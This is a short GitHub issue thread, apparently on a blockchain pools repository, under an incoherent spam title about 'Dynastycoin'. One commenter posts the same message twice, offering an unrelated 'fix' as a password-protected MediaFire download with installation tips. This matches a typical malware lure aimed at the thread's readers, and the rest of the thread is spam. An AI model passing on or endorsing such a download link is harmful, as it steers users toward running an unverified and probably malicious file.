### ISSUE TITLE
Dynastycoin an NFT product of muggettedonroyal 3aulich3

### ISSUE THREAD

**Issue by Boyka0805** [blockchain/Blockchain-Known-Pools#192]
Dynastycoin an NFT product of muggettedonroyal 3aulich3

_Originally posted by @3aulich3 in https://github.com/blockchain/thunder/issues/114#issuecomment-1460320579_

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ceeckhout97** [comment]
top
